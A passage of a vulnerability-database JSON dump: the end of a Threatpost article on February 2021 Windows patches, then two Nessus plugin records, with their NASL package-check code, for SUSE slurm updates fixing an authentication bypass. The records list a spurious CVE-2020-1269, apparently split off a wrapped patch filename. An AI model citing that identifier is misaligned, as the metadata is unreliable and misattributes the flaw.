and publicly disclosed vulnerabilities,\u201d said Goettl.\n\nAfter that, development tools and IT tools \u201cneed some attention,\u201d he added.\n\n\u201c.Net Core and PsExec disclosures are a concern that should not go unaddressed. Because this development and IT tools do not follow the same update process as OS and application updates, it is important to review your DevOps processes and determine if you are able to detect and respond to updates for common dev components,\u201d he said. \u201cFor tools like PsExec it is important to understand your software inventory and where these tools are installed and ensure you can distribute updated versions as needed.\u201d\n\n**_Is your business an easy mark? _**_Save your spot for \u201c15 Cybersecurity Gaffes SMBs Make,\u201d **a **_**[_FREE Threatpost webinar_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>) **_**on Feb. 24 at 2 p.m. ET.** Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. __[Register here](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)__ for the Wed., Feb. 24 LIVE webinar. _\n", "cvss3": {}, "published": "2021-02-09T22:33:08", "type": "threatpost", "title": "Actively Exploited Windows Kernel Bug Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1472", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-24112", "CVE-2021-26701"], "modified": "2021-02-09T22:33:08", "id": "THREATPOST:1502920D4F50B0D128077B515815C023", "href": "https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T15:20:02", "description": "This update for slurm_18_08 fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled CVE-2020-12693 This fixes and issue where authentication could be bypassed via an alternate path or channel when message Aggregation was enabled. A race condition allowed a user to launch a process as an arbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-11T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : slurm_18_08 (SUSE-SU-2020:2600-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269", "CVE-2020-12693"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpmi0_18_08", "p-cpe:/a:novell:suse_linux:libpmi0_18_08-debuginfo", "p-cpe:/a:novell:suse_linux:libslurm33", "p-cpe:/a:novell:suse_linux:libslurm33-debuginfo", "p-cpe:/a:novell:suse_linux:perl-slurm_18_08", "p-cpe:/a:novell:suse_linux:perl-slurm_18_08-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08", "p-cpe:/a:novell:suse_linux:slurm_18_08-auth-none", "p-cpe:/a:novell:suse_linux:slurm_18_08-auth-none-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-config", "p-cpe:/a:novell:suse_linux:slurm_18_08-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-debugsource", "p-cpe:/a:novell:suse_linux:slurm_18_08-devel", "p-cpe:/a:novell:suse_linux:slurm_18_08-doc", "p-cpe:/a:novell:suse_linux:slurm_18_08-lua", "p-cpe:/a:novell:suse_linux:slurm_18_08-lua-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-munge", "p-cpe:/a:novell:suse_linux:slurm_18_08-munge-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-node", "p-cpe:/a:novell:suse_linux:slurm_18_08-node-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-pam_slurm", "p-cpe:/a:novell:suse_linux:slurm_18_08-pam_slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-plugins", "p-cpe:/a:novell:suse_linux:slurm_18_08-plugins-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-slurmdbd", "p-cpe:/a:novell:suse_linux:slurm_18_08-slurmdbd-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-sql", "p-cpe:/a:novell:suse_linux:slurm_18_08-sql-debuginfo", "p-cpe:/a:novell:suse_linux:slurm_18_08-torque", "p-cpe:/a:novell:suse_linux:slurm_18_08-torque-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2600-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140513", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2600-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140513);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\"CVE-2020-1269\", \"CVE-2020-12693\");\n\n script_name(english:\"SUSE SLES12 Security Update : slurm_18_08 (SUSE-SU-2020:2600-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for slurm_18_08 fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled\nCVE-2020-12693 This fixes and issue where authentication could be\nbypassed via an alternate path or channel when message Aggregation was\nenabled. A race condition allowed a user to launch a process as an\narbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-12693/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202600-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd3ec399\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for HPC 12 :\n\nzypper in -t patch SUSE-SLE-Module-HPC-12-2020-2600=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1269\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12693\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0_18_08\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0_18_08-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm33-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm_18_08\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm_18_08-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-auth-none\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-auth-none-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-lua-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-munge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-munge-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-node-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-pam_slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-pam_slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-slurmdbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-slurmdbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-sql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-sql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-torque\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm_18_08-torque-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpmi0_18_08-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libpmi0_18_08-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libslurm33-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"libslurm33-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"perl-slurm_18_08-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"perl-slurm_18_08-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-auth-none-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-auth-none-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-config-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-debugsource-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-devel-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-doc-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-lua-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-lua-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-munge-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-munge-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-node-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-node-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-pam_slurm-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-pam_slurm-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-plugins-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-plugins-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-slurmdbd-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-slurmdbd-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-sql-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-sql-debuginfo-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-torque-18.08.9-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"slurm_18_08-torque-debuginfo-18.08.9-3.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"slurm_18_08\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-14T14:59:29", "description": "This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled CVE-2020-12693 This fixes and issue where authentication could be bypassed via an alternate path or channel when message Aggregation was enabled. A race condition allowed a user to launch a process as an arbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-11T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : slurm (SUSE-SU-2020:2598-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1269", "CVE-2020-12693"], "modified": "2022-05-12T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpmi0", "p-cpe:/a:novell:suse_linux:libpmi0-debuginfo", "p-cpe:/a:novell:suse_linux:libslurm33", "p-cpe:/a:novell:suse_linux:libslurm33-debuginfo", "p-cpe:/a:novell:suse_linux:perl-slurm", "p-cpe:/a:novell:suse_linux:perl-slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm", "p-cpe:/a:novell:suse_linux:slurm-auth-none", "p-cpe:/a:novell:suse_linux:slurm-auth-none-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-config", "p-cpe:/a:novell:suse_linux:slurm-config-man", "p-cpe:/a:novell:suse_linux:slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-debugsource", "p-cpe:/a:novell:suse_linux:slurm-devel", "p-cpe:/a:novell:suse_linux:slurm-doc", "p-cpe:/a:novell:suse_linux:slurm-lua", "p-cpe:/a:novell:suse_linux:slurm-lua-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-munge", "p-cpe:/a:novell:suse_linux:slurm-munge-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-node", "p-cpe:/a:novell:suse_linux:slurm-node-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-pam_slurm", "p-cpe:/a:novell:suse_linux:slurm-pam_slurm-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-plugins", "p-cpe:/a:novell:suse_linux:slurm-plugins-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-slurmdbd", "p-cpe:/a:novell:suse_linux:slurm-slurmdbd-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-sql", "p-cpe:/a:novell:suse_linux:slurm-sql-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-sview", "p-cpe:/a:novell:suse_linux:slurm-sview-debuginfo", "p-cpe:/a:novell:suse_linux:slurm-torque", "p-cpe:/a:novell:suse_linux:slurm-torque-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2598-1.NASL", "href": "https://www.tenable.com/plugins/nessus/140512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2598-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140512);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\"CVE-2020-1269\", \"CVE-2020-12693\");\n\n script_name(english:\"SUSE SLES15 Security Update : slurm (SUSE-SU-2020:2598-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for slurm fixes the following issues :\n\nFix Authentication Bypass when Message Aggregation is enabled\nCVE-2020-12693 This fixes and issue where authentication could be\nbypassed via an alternate path or channel when message Aggregation was\nenabled. A race condition allowed a user to launch a process as an\narbitrary user. Add :\n\nFix-Authentication-Bypass-when-Message-Aggregation-is-enabled-CVE-2020\n-1269 3.patch (CVE-2020-12693, bsc#1172004).\n\nRemove unneeded build dependency to postgresql-devel.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-12693/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202598-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e477ba03\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for HPC 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-HPC-15-SP1-2020-2598=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1269\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-12693\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpmi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libslurm33-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-auth-none\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-auth-none-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-config-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-lua\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-lua-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-munge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-munge-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-node\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-node-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-pam_slurm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-pam_slurm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-slurmdbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-slurmdbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-sview-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-torque\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:slurm-torque-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 